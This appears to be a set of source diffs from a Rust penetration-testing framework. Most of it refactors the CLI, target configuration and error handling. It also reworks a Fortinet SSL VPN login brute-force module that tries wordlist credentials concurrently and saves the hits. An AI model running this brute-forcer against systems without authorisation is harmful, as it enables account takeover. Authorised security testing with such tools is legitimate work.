match config::GLOBAL_CONFIG.get_single_target_ip() {
Ok(ip) => {
println!("[*] Using global target: {}", config::GLOBAL_CONFIG.get_target().unwrap_or_default());
ip
}
Err(e) => {
return Err(anyhow::anyhow!("No target specified and global target error: {}", e));
}
Err(e) => return Err(anyhow::anyhow!("No target specified and global target error: {}", e)),
}
} else {
return Err(anyhow::anyhow!("No target specified. Use --target <ip> or --set-target <ip/subnet>"));
};
let target = normalize_target(&raw)?; // IPv6 wrap only, no port
let module = cli_args.module.clone().unwrap_or_default();
let target = normalize_target(&raw)?;
crate::utils::verbose_log(cli_args.verbose, &format!("Normalized target: {}", target));
let module = cli_args.module.clone().unwrap_or_default();
match command {
"exploit" => {
let trimmed = module.trim_start_matches("exploits/");
@@ -44,39 +44,54 @@ pub async fn handle_command(command: &str, cli_args: &Cli) -> Result<()> {
let trimmed = module.trim_start_matches("creds/");
creds::run_cred_check(trimmed, &target).await?;
},
_ => {
eprintln!("Unknown command '{}'", command);
}
_ => eprintln!("Unknown command '{}'", command),
}
Ok(())
}
/// Interactive shell: handles `run` with raw target string
/// If raw_target is empty, uses global target if available
pub async fn run_module(module_path: &str, raw_target: &str) -> Result<()> {
let available = discover_modules();
/// Interactive module runner
pub async fn run_module(module_path: &str, raw_target: &str, verbose: bool) -> Result<()> {
crate::utils::verbose_log(verbose, &format!("Attempting to run module '{}' against '{}'", module_path, raw_target));
// 1. Resolve module using compile-time list
let available = discover_modules();
// Fuzzy matching logic
let full_match = available.iter().find(|m| m == &module_path);
let short_match = available.iter().find(|m| {
m.rsplit_once('/')
.map(|(_, short)| short == module_path)
.unwrap_or(false)
m.rsplit_once('/').map(|(_, short)| short == module_path).unwrap_or(false)
});
if let Some(m) = full_match {
crate::utils::verbose_log(verbose, &format!("Exact module match found: {}", m));
} else if let Some(m) = short_match {
crate::utils::verbose_log(verbose, &format!("Short module match found: {}", m));
}
let resolved = if let Some(m) = full_match {
m
} else if let Some(m) = short_match {
m
} else {
eprintln!("❌ Unknown module '{}'. Available modules:", module_path);
for m in available {
println!(" {}", m);
use colored::*;
eprintln!("{}", format!("❌ Unknown module '{}'.", module_path).red());
// Fuzzy matching
let best_match = available.iter()
.map(|m| (m, strsim::levenshtein(module_path, m)))
.min_by_key(|&(_, dist)| dist);
if let Some((suggestion, dist)) = best_match {
if dist < 5 { // Threshold for suggestions
eprintln!("{}", format!(" Did you mean: {}?", suggestion).yellow());
}
}
return Ok(());
return Err(anyhow::anyhow!("Module not found"));
};
// Use provided target, or fall back to global target
// 2. Resolve target
let target_str = if raw_target.is_empty() {
if config::GLOBAL_CONFIG.has_target() {
match config::GLOBAL_CONFIG.get_single_target_ip() {
@@ -84,18 +99,17 @@ pub async fn run_module(module_path: &str, raw_target: &str) -> Result<()> {
println!("[*] Using global target: {}", config::GLOBAL_CONFIG.get_target().unwrap_or_default());
ip
}
Err(e) => {
return Err(anyhow::anyhow!("No target specified and global target error: {}", e));
}
Err(e) => return Err(anyhow::anyhow!("Global target error: {}", e)),
}
} else {
return Err(anyhow::anyhow!("No target specified. Use 'set target <ip/subnet>' or provide target when running module"));
return Err(anyhow::anyhow!("No target specified."));
}
} else {
raw_target.to_string()
};
let target = normalize_target(&target_str)?;
crate::utils::verbose_log(verbose, &format!("Target resolved to: {}", target));
let mut parts = resolved.splitn(2, '/');
let category = parts.next().unwrap_or("");
@@ -111,29 +125,14 @@ pub async fn run_module(module_path: &str, raw_target: &str) -> Result<()> {
Ok(())
}
/// Finds all .rs module paths inside `src/modules/**`, excluding mod.rs
/// Helper to aggregate all available modules from generated constants
pub fn discover_modules() -> Vec<String> {
let mut modules = Vec::new();
let categories = ["exploits", "scanners", "creds"];
for category in &categories {
let base = format!("src/modules/{}", category);
for entry in WalkDir::new(&base).max_depth(6).into_iter().filter_map(|e| e.ok()) {
let p = entry.path();
if p.is_file()
&& p.extension().map_or(false, |e| e == "rs")
&& p.file_name().map_or(true, |n| n != "mod.rs")
{
if let Ok(rel) = p.strip_prefix("src/modules") {
let module_path = rel
.with_extension("")
.to_string_lossy()
.replace("\\", "/");
modules.push(module_path);
}
}
}
}
// Map exploit::AVAILABLE_MODULES -> "exploits/{name}"
modules.extend(exploit::AVAILABLE_MODULES.iter().map(|m| format!("exploits/{}", m)));
modules.extend(scanner::AVAILABLE_MODULES.iter().map(|m| format!("scanners/{}", m)));
modules.extend(creds::AVAILABLE_MODULES.iter().map(|m| format!("creds/{}", m)));
modules
}
+15 -16
View File
@@ -61,7 +61,7 @@ impl GlobalConfig {
// Try to parse as CIDR subnet first
if let Ok(network) = trimmed.parse::<IpNetwork>() {
let mut target_guard = self.target.write().unwrap();
let mut target_guard = self.target.write().map_err(|_| anyhow!("Config lock poisoned"))?;
*target_guard = Some(TargetConfig::Subnet(network));
return Ok(());
}
@@ -70,7 +70,7 @@ impl GlobalConfig {
Self::validate_hostname_or_ip(trimmed)?;
// Otherwise, treat as single IP or hostname
let mut target_guard = self.target.write().unwrap();
let mut target_guard = self.target.write().map_err(|_| anyhow!("Config lock poisoned"))?;
*target_guard = Some(TargetConfig::Single(trimmed.to_string()));
Ok(())
}
@@ -87,7 +87,7 @@ impl GlobalConfig {
// Check for valid characters
// Allow: a-z, A-Z, 0-9, '.', '-', '_', ':', '[', ']' (for IPv6)
let valid_chars = Regex::new(r"^[a-zA-Z0-9.\-_:\[\]]+$").unwrap();
let valid_chars = Regex::new(r"^[a-zA-Z0-9.\-_:\[\]]+$").expect("Regex compilation failed");
if !valid_chars.is_match(target) {
return Err(anyhow!(
"Target contains invalid characters. Allowed: letters, numbers, '.', '-', '_', ':', '[', ']'"
@@ -118,8 +118,8 @@ impl GlobalConfig {
/// Get the global target as a single string (for display)
pub fn get_target(&self) -> Option<String> {
let target_guard = self.target.read().unwrap();
target_guard.as_ref().map(|t| match t {
let guard = self.target.read().ok()?;
guard.as_ref().map(|t| match t {
TargetConfig::Single(ip) => ip.clone(),
TargetConfig::Subnet(net) => net.to_string(),
})
@@ -128,9 +128,9 @@ impl GlobalConfig {
/// Get a single IP address from the global target
/// For subnets, returns the network address (first IP)
pub fn get_single_target_ip(&self) -> Result<String> {
let target_guard = self.target.read().unwrap();
let guard = self.target.read().map_err(|_| anyhow!("Config lock poisoned"))?;
match target_guard.as_ref() {
match guard.as_ref() {
Some(TargetConfig::Single(ip)) => {
Ok(ip.clone())
}
@@ -146,9 +146,9 @@ impl GlobalConfig {
/// Returns a vector of IP addresses (expands subnets)
/// For very large subnets (> 65536 IPs), returns an error
pub fn get_target_ips(&self) -> Result<Vec<String>> {
let target_guard = self.target.read().unwrap();
let guard = self.target.read().map_err(|_| anyhow!("Config lock poisoned"))?;
match target_guard.as_ref() {
match guard.as_ref() {
Some(TargetConfig::Single(ip)) => {
// For single IP/hostname, return as-is
Ok(vec![ip.clone()])
@@ -202,21 +202,19 @@ impl GlobalConfig {
/// Check if global target is set
pub fn has_target(&self) -> bool {
let target_guard = self.target.read().unwrap();
target_guard.is_some()
self.target.read().map(|g| g.is_some()).unwrap_or(false)
}
/// Check if global target is a subnet
pub fn is_subnet(&self) -> bool {
let target_guard = self.target.read().unwrap();
matches!(target_guard.as_ref(), Some(TargetConfig::Subnet(_)))
self.target.read().map(|g| matches!(g.as_ref(), Some(TargetConfig::Subnet(_)))).unwrap_or(false)
}
/// Get the size of the target (number of IPs)
/// For single IPs, returns 1
/// For subnets, returns the subnet size without expanding
pub fn get_target_size(&self) -> Option<u64> {
let target_guard = self.target.read().unwrap();
let target_guard = self.target.read().ok()?;
match target_guard.as_ref() {
Some(TargetConfig::Single(_)) => Some(1),
Some(TargetConfig::Subnet(net)) => {
@@ -252,8 +250,9 @@ impl GlobalConfig {
/// Clear the global target
pub fn clear_target(&self) {
let mut target_guard = self.target.write().unwrap();
*target_guard = None;
if let Ok(mut target_guard) = self.target.write() {
*target_guard = None;
}
}
}
+202 -9
View File
@@ -1,6 +1,8 @@
use anyhow::{anyhow, Context, Result};
use clap::Parser;
use colored::*;
use std::net::SocketAddr;
use std::process;
mod cli;
mod shell;
@@ -10,6 +12,63 @@ mod utils;
mod api;
mod config;
/// Custom error types for CLI operations
#[derive(Debug)]
pub enum CliError {
InvalidFlagCombination { flag1: String, flag2: String, message: String },
// MissingRequiredFlag is handled by clap, but we can wrap validaton errors
ValidationFailed { field: String, reason: String },
ModuleNotFound { module: String, suggestions: Vec<String> },
TargetInvalid { target: String, reason: String },
ApiError { message: String },
Generic { message: String },
}
impl std::fmt::Display for CliError {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
CliError::InvalidFlagCombination { flag1, flag2, message } => {
write!(f, "{} Invalid flag combination detected: {} + {}\n {}", "".red(), flag1.yellow(), flag2.yellow(), message)
},
CliError::ValidationFailed { field, reason } => {
write!(f, "{} Validation failed for '{}': {}", "".red(), field.yellow(), reason)
},
CliError::ModuleNotFound { module, suggestions } => {
writeln!(f, "{} Module '{}' not found.", "".red(), module.yellow())?;
if !suggestions.is_empty() {
writeln!(f, " Did you mean:")?;
for s in suggestions {
writeln!(f, " - {}", s.green())?;
}
}
Ok(())
},
CliError::TargetInvalid { target, reason } => {
write!(f, "{} Invalid target '{}': {}", "".red(), target.yellow(), reason)
},
CliError::ApiError { message } => {
write!(f, "{} API Server Error: {}", "".red(), message)
},
CliError::Generic { message } => {
write!(f, "{} Error: {}", "".red(), message)
}
}
}
}
impl CliError {
pub fn exit_code(&self) -> i32 {
match self {
CliError::Generic { .. } => 1,
CliError::InvalidFlagCombination { .. } => 2,
CliError::ValidationFailed { .. } => 2,
CliError::ModuleNotFound { .. } => 3,
CliError::TargetInvalid { .. } => 4,
CliError::ApiError { .. } => 5,
}
}
}
/// Maximum length for API key to prevent memory exhaustion
const MAX_API_KEY_LENGTH: usize = 256;
@@ -19,13 +78,87 @@ const MAX_BIND_ADDRESS_LENGTH: usize = 128;
/// Maximum IP limit for hardening mode
const MAX_IP_LIMIT: u32 = 10000;
/// Helper for verbose logging
fn verbose_log(verbose: bool, message: &str) {
if verbose {
eprintln!("{} {}", "[VERBOSE]".dimmed(), message.dimmed());
}
}
/// Prints CLI usage hint
fn print_usage_hint() {
eprintln!("{}", "Usage hints:".yellow().bold());
eprintln!(" {} Launch interactive shell", "cargo run".cyan());
eprintln!(" {} Run module on target", "cargo run -- -m <module> -t <target>".cyan());
eprintln!(" {} Start API server", "cargo run -- --api --api-key <key>".cyan());
eprintln!(" {} List all modules in shell", "cargo run (then type 'modules')".cyan());
eprintln!();
eprintln!("{}", "For more help: cargo run -- --help".dimmed());
}
/// Validates CLI flag combinations and prints warnings for common mistakes
fn validate_cli_flags(cli_args: &cli::Cli) -> Result<()> {
// Warning: -m without -t
if cli_args.module.is_some() && cli_args.target.is_none() {
eprintln!();
eprintln!("{}", "⚠ Warning: --module (-m) specified without --target (-t)".yellow().bold());
eprintln!("{}", " The module requires a target to run against.".yellow());
eprintln!();
print_usage_hint();
eprintln!();
eprintln!("{}", "Launching interactive shell instead...".cyan());
eprintln!();
}
// Warning: -t without -m (not an error, but inform user)
if cli_args.target.is_some() && cli_args.module.is_none() && cli_args.command.is_none() {
eprintln!();
eprintln!("{}", " Note: --target (-t) specified without --module (-m)".blue().bold());
eprintln!("{}", " Target will be available in interactive shell.".blue());
eprintln!();
}
// Warning: --harden without --api
if cli_args.harden && !cli_args.api {
eprintln!();
eprintln!("{}", "⚠ Warning: --harden requires --api mode".yellow().bold());
eprintln!("{}", " Hardening features are only active in API server mode.".yellow());
eprintln!();
print_usage_hint();
print_usage_hint();
return Err(anyhow!(CliError::InvalidFlagCombination {
flag1: "--harden".to_string(),
flag2: "no --api".to_string(),
message: "Harden mode requires API mode".to_string()
}));
}
// Note: --ip-limit requires --harden is enforced by clap's requires attribute
// Warning: --interface without --api
if let Some(ref iface) = cli_args.interface {
if !cli_args.api && iface != "0.0.0.0" { // Ignore default value
eprintln!();
eprintln!("{}", "⚠ Warning: --interface requires --api mode".yellow().bold());
eprintln!("{}", " Interface binding is only used in API server mode.".yellow());
eprintln!();
}
}
Ok(())
}
/// Validates the bind address format for security
fn validate_bind_address(addr: &str) -> Result<String> {
let trimmed = addr.trim();
// Length check
if trimmed.is_empty() {
return Err(anyhow!("Bind address cannot be empty"));
return Err(anyhow!(CliError::ValidationFailed {
field: "bind_address".to_string(),
reason: "Address cannot be empty".to_string()
}));
}
if trimmed.len() > MAX_BIND_ADDRESS_LENGTH {
@@ -80,7 +213,10 @@ fn validate_api_key(key: &str) -> Result<String> {
/// Validates IP limit for hardening mode
fn validate_ip_limit(limit: u32) -> Result<u32> {
if limit == 0 {
return Err(anyhow!("IP limit must be greater than 0"));
return Err(anyhow!(CliError::ValidationFailed {
field: "ip_limit".to_string(),
reason: "Must be greater than 0".to_string()
}));
}
if limit > MAX_IP_LIMIT {
@@ -94,21 +230,49 @@ fn validate_ip_limit(limit: u32) -> Result<u32> {
}
#[tokio::main]
async fn main() -> Result<()> {
async fn main() {
if let Err(e) = run().await {
// Check if downcast to CliError works
if let Some(cli_error) = e.downcast_ref::<CliError>() {
eprintln!("{}", cli_error);
process::exit(cli_error.exit_code());
} else {
// Fallback for generic anyhow errors
eprintln!("{} {}", "".red(), e);
process::exit(1);
}
}
}
async fn run() -> Result<()> {
// Parse command-line arguments
let cli_args = cli::Cli::parse();
verbose_log(cli_args.verbose, "CLI arguments parsed successfully");
// Validate CLI flag combinations (prints warnings for common mistakes)
verbose_log(cli_args.verbose, "Validating CLI flags...");
validate_cli_flags(&cli_args)?;
// Handle list_modules flag
if cli_args.list_modules {
verbose_log(cli_args.verbose, "Listing all modules...");
utils::list_all_modules();
return Ok(());
}
// Check if API mode is requested
if cli_args.api {
let api_key_raw = cli_args
.api_key
.context("--api-key is required when using --api mode")?;
.as_ref()
.ok_or_else(|| anyhow!("--api-key is required when using --api mode"))?;
// Validate API key
let api_key = validate_api_key(&api_key_raw)
let api_key = validate_api_key(api_key_raw)
.context("Invalid API key")?;
let interface = cli_args.interface.unwrap_or_else(|| "0.0.0.0".to_string());
let interface = cli_args.interface.clone().unwrap_or_else(|| "0.0.0.0".to_string());
// Validate and normalize bind address
let bind_address = validate_bind_address(&interface)
@@ -121,25 +285,54 @@ async fn main() -> Result<()> {
let ip_limit = validate_ip_limit(ip_limit_raw)
.context("Invalid IP limit")?;
api::start_api_server(&bind_address, api_key, harden, ip_limit).await?;
verbose_log(cli_args.verbose, &format!("Starting API server on {}...", bind_address));
api::start_api_server(
&bind_address,
api_key,
harden,
ip_limit,
cli_args.verbose,
cli_args.queue_size,
cli_args.workers,
).await?;
return Ok(());
}
// Set global target if provided
if let Some(ref target) = cli_args.set_target {
verbose_log(cli_args.verbose, &format!("Setting global target to: {}", target));
// Target validation is done in config::set_target
config::GLOBAL_CONFIG.set_target(target)?;
println!(" Global target set to: {}", target);
println!("{} Global target set to: {}", "".green(), target);
}
// If user provided subcommands (e.g., "exploit", "scan", etc.) from CLI, handle them directly:
if let Some(cmd) = &cli_args.command {
verbose_log(cli_args.verbose, &format!("Executing subcommand: {}", cmd));
commands::handle_command(cmd, &cli_args).await?;
}
// Improved module+target handling: Run module directly if both -m and -t (or global target) are present
else if let Some(ref module) = cli_args.module {
if let Some(ref target) = cli_args.target {
verbose_log(cli_args.verbose, &format!("Running module '{}' against '{}'", module, target));
commands::run_module(module, target, cli_args.verbose).await?;
} else if config::GLOBAL_CONFIG.has_target() {
let target = config::GLOBAL_CONFIG.get_target().unwrap_or_default();
verbose_log(cli_args.verbose, &format!("Running module '{}' against global target '{}'", module, target));
commands::run_module(module, &target, cli_args.verbose).await?;
} else {
// If only -m: Show warning, launch shell with module preselected (Phase 3 mostly, but good fallback)
eprintln!("{}", "⚠ Warning: --module specified without --target. Launching shell...".yellow());
verbose_log(cli_args.verbose, "Launching interactive shell...");
shell::interactive_shell(cli_args.verbose).await?;
}
}
// Otherwise, launch the interactive shell
else {
shell::interactive_shell().await?;
verbose_log(cli_args.verbose, "Launching interactive shell...");
shell::interactive_shell(cli_args.verbose).await?;
}
Ok(())
}
@@ -177,9 +177,17 @@ pub async fn check_http_form(config: &Config) -> Result<Option<(ServiceType, Str
("btnSubmit", "Login"),
];
// Manual form construction
let mut body = String::new();
for (key, val) in &data {
if !body.is_empty() { body.push('&'); }
body.push_str(&format!("{}={}", key, urlencoding::encode(val)));
}
let res = client
.post(&url)
.form(&data)
.header("Content-Type", "application/x-www-form-urlencoded")
.body(body)
.send()
.await
.context("[!] Failed to send HTTP form request")?;
+174 -408
View File
@@ -4,92 +4,26 @@ use futures::stream::{FuturesUnordered, StreamExt};
use reqwest::{ClientBuilder, redirect::Policy};
use std::{
fs::File,
io::{BufRead, BufReader, Write},
path::{Path, PathBuf},
io::Write,
sync::Arc,
sync::atomic::{AtomicBool, AtomicU64, Ordering},
time::Instant,
sync::atomic::{AtomicBool, Ordering},
time::Duration,
};
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
use anyhow::Context;
use tokio::{
sync::{Mutex, Semaphore},
time::{sleep, Duration, timeout},
time::{sleep, timeout},
};
use crate::utils::{
prompt_yes_no, prompt_default, prompt_int_range,
load_lines, prompt_wordlist, normalize_target,
get_filename_in_current_dir, prompt_port,
};
use regex::Regex;
use once_cell::sync::Lazy;
use crate::modules::creds::utils::BruteforceStats;
const PROGRESS_INTERVAL_SECS: u64 = 2;
struct Statistics {
total_attempts: AtomicU64,
successful_attempts: AtomicU64,
failed_attempts: AtomicU64,
error_attempts: AtomicU64,
start_time: Instant,
}
impl Statistics {
fn new() -> Self {
Self {
total_attempts: AtomicU64::new(0),
successful_attempts: AtomicU64::new(0),
failed_attempts: AtomicU64::new(0),
error_attempts: AtomicU64::new(0),
start_time: Instant::now(),
}
}
fn record_attempt(&self, success: bool, error: bool) {
self.total_attempts.fetch_add(1, Ordering::Relaxed);
if error {
self.error_attempts.fetch_add(1, Ordering::Relaxed);
} else if success {
self.successful_attempts.fetch_add(1, Ordering::Relaxed);
} else {
self.failed_attempts.fetch_add(1, Ordering::Relaxed);
}
}
fn print_progress(&self) {
let total = self.total_attempts.load(Ordering::Relaxed);
let success = self.successful_attempts.load(Ordering::Relaxed);
let failed = self.failed_attempts.load(Ordering::Relaxed);
let errors = self.error_attempts.load(Ordering::Relaxed);
let elapsed = self.start_time.elapsed().as_secs_f64();
let rate = if elapsed > 0.0 { total as f64 / elapsed } else { 0.0 };
print!(
"\r{} {} attempts | {} OK | {} fail | {} err | {:.1}/s ",
"[Progress]".cyan(),
total.to_string().bold(),
success.to_string().green(),
failed,
errors.to_string().red(),
rate
);
let _ = std::io::Write::flush(&mut std::io::stdout());
}
fn print_final(&self) {
println!();
let total = self.total_attempts.load(Ordering::Relaxed);
let success = self.successful_attempts.load(Ordering::Relaxed);
let failed = self.failed_attempts.load(Ordering::Relaxed);
let errors = self.error_attempts.load(Ordering::Relaxed);
let elapsed = self.start_time.elapsed().as_secs_f64();
println!("{}", "=== Statistics ===".bold());
println!(" Total attempts: {}", total);
println!(" Successful: {}", success.to_string().green().bold());
println!(" Failed: {}", failed);
println!(" Errors: {}", errors.to_string().red());
println!(" Elapsed time: {:.2}s", elapsed);
if elapsed > 0.0 {
println!(" Average rate: {:.1} attempts/s", total as f64 / elapsed);
}
}
}
fn display_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ Fortinet SSL VPN Brute Force Module ║".cyan());
@@ -102,107 +36,58 @@ pub async fn run(target: &str) -> Result<()> {
display_banner();
println!("{}", format!("[*] Target: {}", target).cyan());
let port: u16 = loop {
let input = prompt_default("Fortinet VPN Port", "443").await?;
match input.trim().parse::<u16>() {
Ok(p) if p > 0 => break p,
Ok(_) => println!("{}", "Port must be between 1 and 65535.".yellow()),
Err(_) => println!("{}", "Invalid port number. Please enter a number between 1 and 65535.".yellow()),
}
};
let port: u16 = prompt_port("Fortinet VPN Port", 443)?;
let usernames_file_path = loop {
let input = prompt_required("Username wordlist path").await?;
let path = Path::new(&input);
if !path.exists() {
println!("{}", format!("File '{}' does not exist.", input).yellow());
continue;
}
if !path.is_file() {
println!("{}", format!("'{}' is not a regular file.", input).yellow());
continue;
}
match File::open(path) {
Ok(_) => break input,
Err(e) => {
println!("{}", format!("Cannot read file '{}': {}", input, e).yellow());
continue;
}
}
};
let usernames_file_path = prompt_wordlist("Username wordlist path")?;
let passwords_file_path = prompt_wordlist("Password wordlist path")?;
let passwords_file_path = loop {
let input = prompt_required("Password wordlist path").await?;
let path = Path::new(&input);
if !path.exists() {
println!("{}", format!("File '{}' does not exist.", input).yellow());
continue;
}
if !path.is_file() {
println!("{}", format!("'{}' is not a regular file.", input).yellow());
continue;
}
match File::open(path) {
Ok(_) => break input,
Err(e) => {
println!("{}", format!("Cannot read file '{}': {}", input, e).yellow());
continue;
}
}
};
let concurrency = prompt_int_range("Max concurrent tasks", 10, 1, 10000)? as usize;
let timeout_secs = prompt_int_range("Connection timeout (seconds)", 10, 1, 300)? as u64;
let concurrency: usize = loop {
let input = prompt_default("Max concurrent tasks", "10").await?;
match input.trim().parse::<usize>() {
Ok(n) if n > 0 && n <= 10000 => break n,
Ok(n) if n == 0 => println!("{}", "Concurrency must be greater than 0.".yellow()),
Ok(_) => println!("{}", "Concurrency must be between 1 and 10000.".yellow()),
Err(_) => println!("{}", "Invalid number. Please enter a positive integer.".yellow()),
}
};
let timeout_secs: u64 = loop {
let input = prompt_default("Connection timeout (seconds)", "10").await?;
match input.trim().parse::<u64>() {
Ok(n) if n > 0 && n <= 300 => break n,
Ok(n) if n == 0 => println!("{}", "Timeout must be greater than 0.".yellow()),
Ok(_) => println!("{}", "Timeout must be between 1 and 300 seconds.".yellow()),
Err(_) => println!("{}", "Invalid timeout. Please enter a number between 1 and 300.".yellow()),
}
};
let stop_on_success = prompt_yes_no("Stop on first success?", true).await?;
let save_results = prompt_yes_no("Save results to file?", true).await?;
let save_path = if save_results {
Some(prompt_default("Output file name", "fortinet_results.txt").await?)
let stop_on_success = prompt_yes_no("Stop on first success?", true)?;
let _save_results = prompt_yes_no("Save results to file?", true)?;
let save_path = if _save_results {
Some(prompt_default("Output file name", "fortinet_results.txt")?)
} else {
None
};
let verbose = prompt_yes_no("Verbose mode?", false).await?;
let combo_mode = prompt_yes_no("Combination mode? (try every password with every user)", false).await?;
let verbose = prompt_yes_no("Verbose mode?", false)?;
let combo_mode = prompt_yes_no("Combination mode? (try every password with every user)", false)?;
let trusted_cert = prompt_optional("Trusted certificate SHA256 (optional, for certificate pinning)").await?;
let realm = prompt_optional("Authentication realm (optional)").await?;
// Optional prompts
// We don't have prompt_optional in shared utils yet?
// Yes we do, implicitly via prompt_default("") or similar, check utils.rs
// Actually utils has prompt_default. If user enters empty, it returns default.
// If we want optional, we might need to rely on prompt_default returning empty string if default is empty?
// Let's implement a quick local helper or use prompt_default("", "") if that works.
// The previous code had `prompt_optional`.
// I will use prompt_default with empty default and check for empty string.
let trusted_cert_str = prompt_default("Trusted certificate SHA256 (optional, press Enter to skip)", "")?;
let trusted_cert = if trusted_cert_str.is_empty() { None } else { Some(trusted_cert_str) };
let realm_str = prompt_default("Authentication realm (optional)", "")?;
let realm = if realm_str.is_empty() { None } else { Some(realm_str) };
let base_url = build_fortinet_url(target, port)?;
let found_credentials = Arc::new(Mutex::new(Vec::new()));
let stop_signal = Arc::new(AtomicBool::new(false));
let stats = Arc::new(Statistics::new());
let stats = Arc::new(BruteforceStats::new());
println!("\n[*] Starting brute-force on {}", base_url);
println!("[*] Timeout: {} seconds", timeout_secs);
let users = load_lines(&usernames_file_path)?;
if users.is_empty() {
println!("[!] Username wordlist is empty or invalid. Exiting.");
println!("[!] Username wordlist is empty. Exiting.");
return Ok(());
}
println!("[*] Loaded {} usernames", users.len());
let passwords = load_lines(&passwords_file_path)?;
if passwords.is_empty() {
println!("[!] Password wordlist is empty or invalid. Exiting.");
println!("[!] Password wordlist is empty. Exiting.");
return Ok(());
}
println!("[*] Loaded {} passwords", passwords.len());
@@ -210,26 +95,7 @@ pub async fn run(target: &str) -> Result<()> {
let semaphore = Arc::new(Semaphore::new(concurrency));
let timeout_duration = Duration::from_secs(timeout_secs);
// Generate all credential pairs based on mode
let credential_pairs = if combo_mode {
let mut pairs = Vec::new();
for user in &users {
for pass in &passwords {
pairs.push((user.clone(), pass.clone()));
}
}
pairs
} else {
// Cycle through users for each password
passwords.iter().enumerate()
.map(|(i, pass)| {
let user = users[i % users.len()].clone();
(user, pass.clone())
})
.collect()
};
println!("[*] Testing {} credential combinations", credential_pairs.len());
println!("[*] Testing {} credential combinations", if combo_mode { users.len() * passwords.len() } else { std::cmp::max(users.len(), passwords.len()) });
println!();
// Start progress reporter
@@ -247,76 +113,43 @@ pub async fn run(target: &str) -> Result<()> {
let mut tasks = FuturesUnordered::new();
for (user, pass) in credential_pairs {
if stop_on_success && stop_signal.load(Ordering::Relaxed) {
break;
// Work generation
if combo_mode {
for user in &users {
for pass in &passwords {
if stop_on_success && stop_signal.load(Ordering::Relaxed) { break; }
spawn_fortinet_task(
&mut tasks, &semaphore,
user.clone(), pass.clone(),
base_url.clone(), realm.clone(), trusted_cert.clone(),
found_credentials.clone(), stop_signal.clone(), stats.clone(),
verbose, stop_on_success, timeout_duration
).await;
}
if stop_on_success && stop_signal.load(Ordering::Relaxed) { break; }
}
let base_url_clone = base_url.clone();
let realm_clone = realm.clone();
let trusted_cert_clone = trusted_cert.clone();
let found_credentials_clone = Arc::clone(&found_credentials);
let stop_signal_clone = Arc::clone(&stop_signal);
let semaphore_clone = Arc::clone(&semaphore);
let stats_clone = Arc::clone(&stats);
let verbose_flag = verbose;
let stop_on_success_flag = stop_on_success;
tasks.push(tokio::spawn(async move {
if stop_on_success_flag && stop_signal_clone.load(Ordering::Relaxed) {
return;
}
} else {
let max_len = std::cmp::max(users.len(), passwords.len());
for i in 0..max_len {
if stop_on_success && stop_signal.load(Ordering::Relaxed) { break; }
let user = &users[i % users.len()];
let pass = &passwords[i % passwords.len()];
let _permit = match semaphore_clone.acquire_owned().await {
Ok(permit) => permit,
Err(_) => return,
};
if stop_on_success_flag && stop_signal_clone.load(Ordering::Relaxed) {
return;
}
match try_fortinet_login(
&base_url_clone,
&user,
&pass,
&realm_clone,
&trusted_cert_clone,
timeout_duration
).await {
Ok(true) => {
println!("\r{}", format!("[+] {} -> {}:{}", base_url_clone, user, pass).green().bold());
let mut found = found_credentials_clone.lock().await;
found.push((base_url_clone.clone(), user.clone(), pass.clone()));
stats_clone.record_attempt(true, false);
if stop_on_success_flag {
stop_signal_clone.store(true, Ordering::Relaxed);
}
}
Ok(false) => {
stats_clone.record_attempt(false, false);
if verbose_flag {
println!("\r{}", format!("[-] {} -> {}:{}", base_url_clone, user, pass).dimmed());
}
}
Err(e) => {
stats_clone.record_attempt(false, true);
if verbose_flag {
println!("\r{}", format!("[!] {}: error: {}", base_url_clone, e).red());
}
}
}
sleep(Duration::from_millis(100)).await;
}));
spawn_fortinet_task(
&mut tasks, &semaphore,
user.clone(), pass.clone(),
base_url.clone(), realm.clone(), trusted_cert.clone(),
found_credentials.clone(), stop_signal.clone(), stats.clone(),
verbose, stop_on_success, timeout_duration
).await;
}
}
// Wait for all tasks to complete
// Wait for tasks
while let Some(res) = tasks.next().await {
if let Err(e) = res {
if verbose {
println!("\r{}", format!("[!] Task join error: {}", e).red());
}
stats.record_error(format!("Task panic: {}", e)).await;
}
}
@@ -325,7 +158,7 @@ pub async fn run(target: &str) -> Result<()> {
let _ = progress_handle.await;
// Print final statistics
stats.print_final();
stats.print_final().await;
let creds = found_credentials.lock().await;
if creds.is_empty() {
@@ -338,19 +171,11 @@ pub async fn run(target: &str) -> Result<()> {
if let Some(path_str) = save_path {
let filename = get_filename_in_current_dir(&path_str);
match File::create(&filename) {
Ok(mut file) => {
for (url, user, pass) in creds.iter() {
if writeln!(file, "{} -> {}:{}", url, user, pass).is_err() {
eprintln!("[!] Error writing to result file: {}", filename.display());
break;
}
}
println!("[+] Results saved to '{}'", filename.display());
}
Err(e) => {
eprintln!("[!] Could not create output file '{}': {}", filename.display(), e);
if let Ok(mut file) = File::create(&filename) {
for (url, user, pass) in creds.iter() {
let _ = writeln!(file, "{} -> {}:{}", url, user, pass);
}
println!("[+] Results saved to '{}'", filename.display());
}
}
}
@@ -358,6 +183,56 @@ pub async fn run(target: &str) -> Result<()> {
Ok(())
}
async fn spawn_fortinet_task(
tasks: &mut FuturesUnordered<tokio::task::JoinHandle<()>>,
semaphore: &Arc<Semaphore>,
user: String,
pass: String,
base_url: String,
realm: Option<String>,
trusted_cert: Option<String>,
found: Arc<Mutex<Vec<(String, String, String)>>>,
stop_signal: Arc<AtomicBool>,
stats: Arc<BruteforceStats>,
verbose: bool,
stop_on_success: bool,
timeout: Duration
) {
let permit = match semaphore.clone().acquire_owned().await {
Ok(p) => p,
Err(_) => return, // Semaphore closed, stop processing
};
tasks.push(tokio::spawn(async move {
let _permit = permit;
if stop_on_success && stop_signal.load(Ordering::Relaxed) { return; }
match try_fortinet_login(&base_url, &user, &pass, &realm, &trusted_cert, timeout).await {
Ok(true) => {
println!("\r{}", format!("[+] {} -> {}:{}", base_url, user, pass).green().bold());
found.lock().await.push((base_url.clone(), user.clone(), pass.clone()));
stats.record_success();
if stop_on_success {
stop_signal.store(true, Ordering::Relaxed);
}
}
Ok(false) => {
stats.record_failure();
if verbose {
println!("\r{}", format!("[-] {} -> {}:{}", base_url, user, pass).dimmed());
}
}
Err(e) => {
stats.record_error(e.to_string()).await;
if verbose {
println!("\r{}", format!("[!] {}: error: {}", base_url, e).red());
}
}
}
sleep(Duration::from_millis(100)).await;
}));
}
async fn try_fortinet_login(
base_url: &str,
username: &str,
